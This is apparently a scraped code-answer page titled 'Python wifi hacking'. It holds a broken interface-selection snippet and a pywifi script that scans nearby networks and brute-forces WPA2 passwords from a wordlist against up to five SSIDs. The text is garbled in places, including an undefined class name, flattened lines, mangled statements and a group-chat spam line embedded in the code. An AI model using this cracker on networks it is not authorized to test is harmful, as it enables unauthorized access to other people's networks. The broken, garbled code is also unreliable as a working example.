Python wifi hacking

def get_wifi_interface():
    wifi = BDF222()
    if len(wifi.interfaces()) <= 0:
        print u'Wireless card interface not found!'
    if len(wifi.interfaces()) == 1:
        print u'Wireless card interface: %s'%(wifi.interfaces()[0].name())
        return wifi.interfaces()[0]
        print '%-4s   %s'%(u'Serial number',u'Network card interface name')
        for i,w in enumerate(wifi.interfaces()):
            print '%-4s   %s'%(i,
        while True:
            iface_no = raw_input('Please select network card interface serial number:'.decode('utf-8').encode('gbk'))
            no = int(iface_no)
            if no>=0 and no < len(wifi.interfaces()):
                return wifi.interfaces()[no]

Phoenix Logan 186125 points

                                    def get_wifi_interface():
    wifi = PyWiFi()
    if len(wifi.interfaces()) &lt;= 0:
        print u'Wireless card interface not found!'
    if len(wifi.interfaces()) == 1:
        print u'Wireless card interface: %s'%(wifi.interfaces()[0].name())
        return wifi.interfaces()[0]
        print '%-4s   %s'%(u'Serial number',u'Network card interface name')
        for i,w in enumerate(wifi.interfaces()):
            print '%-4s   %s'%(i,
        while True:
            iface_no = raw_input('Please select network card interface serial number:'.decode('utf-8').encode('gbk'))
            no = int(iface_no)
            if no&gt;=0 and no &lt; len(wifi.interfaces()):
                return wifi.interfaces()[no]

4.2 (10 Votes)
Phoenix Logan 186125 points

                                    import pywifi from pywifi import const # quote some definitions import time''' Problems encountered do not understand? Python learning exchange group: 821 460 695 meet your needs, data base files have been uploaded, you can download their own!''' def getwifi(wifilist, wificount):         wifi = pywifi.PyWiFi () # crawled network interface cards         ifaces = wifi.interfaces () [0] # Get the card    ifaces.scan()    time.sleep(8)    bessis = ifaces.scan_results()    allwifilist = []    namelist = []    ssidlist = []    for data in bessis:                 if data.ssid not in namelist: # remove duplicate names WIFI            namelist.append(data.ssid)            allwifilist.append((data.ssid, data.signal))    sorted(allwifilist, key=lambda st: st[1], reverse=True)    time.sleep(1)    n = 0    if len(allwifilist) is not 0:        for item in allwifilist:            if (item[0] not in ssidlist) &amp; (item[0] not in wifilist):                n = n + 1                if n &lt;= wificount:                    ssidlist.append(item[0])    print(allwifilist)    return ssidlist  def getifaces():         wifi = pywifi.PyWiFi () # crawled network interface cards         ifaces = wifi.interfaces () [0] # Get the card         ifaces.disconnect () # disconnect unlimited card connection    return ifaces  def testwifi(ifaces, ssidname, password):         profile = pywifi.Profile () # create a wifi connection file         profile.ssid = ssidname # define wifissid         profile.auth = open const.AUTH_ALG_OPEN # NIC         profile.akm.append (const.AKM_TYPE_WPA2PSK) # wifi encryption algorithm         encrypting unit profile.cipher = const.CIPHER_TYPE_CCMP #         profile.key = password # wifi password         ifaces.remove_all_network_profiles () # delete all other configuration files         tmp_profile = ifaces.add_network_profile (profile) # load the configuration file         ifaces.connect (tmp_profile) # wifi connection         You can connect to the inner (5) # 5 seconds time.sleep    if ifaces.status() == const.IFACE_CONNECTED:        return True    else:        return False  def beginwork(wifinamelist):    ifaces = getifaces()         path = r &quot;password-8 digits .txt&quot;         # Path = r &quot;password- commonly used passwords .txt&quot;    files = open(path, 'r')    while True:        try:            password = files.readline()            password = password.strip('\n')            if not password:                break            for wifiname in wifinamelist:                                 print ( &quot;are trying to:&quot; + wifiname + &quot;,&quot; + password)                if testwifi(ifaces, wifiname, password):                                         print ( &quot;Wifi account:&quot; + wifiname + &quot;, Wifi password:&quot; + password)                    wifinamelist.remove(wifiname)                    break            if not wifinamelist:                break        except:            continue    files.close()  if __name__ == '__main__':         wifinames_e = [ &quot;&quot;, &quot;Vrapile&quot;] # exclude wifi name does not crack    wifinames = getwifi(wifinames_e, 5)    print(wifinames)    beginwork(wifinames)

3.88 (8 Votes)
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